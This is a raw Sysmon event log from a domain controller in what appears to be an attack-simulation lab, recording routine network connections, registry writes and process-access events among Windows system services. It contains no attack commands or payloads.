12:01:24.226{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local49703-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 354300x80000000000000003293Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.223{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49702-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x80000000000000003292Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.223{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49702-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49666- 354300x80000000000000003291Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.221{266CAFBE-646C-6064-0D00-00000000AE01}612C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49701-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 354300x80000000000000003290Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.221{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local49701-truefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local135epmap 11241100x80000000000000003289Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.643{266CAFBE-6495-6064-8100-00000000AE01}4272C:\Windows\system32\taskhostw.exeC:\ProgramData\Microsoft\Crypto\OIDInfo\DsOIDInfo.dat2021-03-31 12:01:25.643 13241300x80000000000000003288Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:01:25.549{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\EpochDWORD (0x00000616) 354300x80000000000000003287Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.216{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local57243- 10341000x80000000000000003286Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.393{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1700-00000000AE01}1844C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003285Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.393{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003284Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.393{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003283Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.393{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003282Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.393{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+b4ff|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000003281Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.393{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+4689|c:\windows\system32\themeservice.dll+3fdd|c:\windows\system32\themeservice.dll+3c53|c:\windows\system32\themeservice.dll+2675|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003280Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.393{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003279Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.393{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003278Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.393{266CAFBE-646C-6064-1000-00000000AE01}11242240C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x147aC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\themeservice.dll+3de3|c:\windows\system32\themeservice.dll+26c0|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003277Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.393{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003276Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.393{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003275Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.393{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003274Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.393{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003273Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.393{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003272Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.393{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003271Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.393{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003270Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.393{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003269Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.393{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000003268Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:01:25.377{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Options\EnablePacketQueueDWORD (0x00000000) 10341000x80000000000000003267Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003266Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003265Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003264Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003263Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:25.377{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003262Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 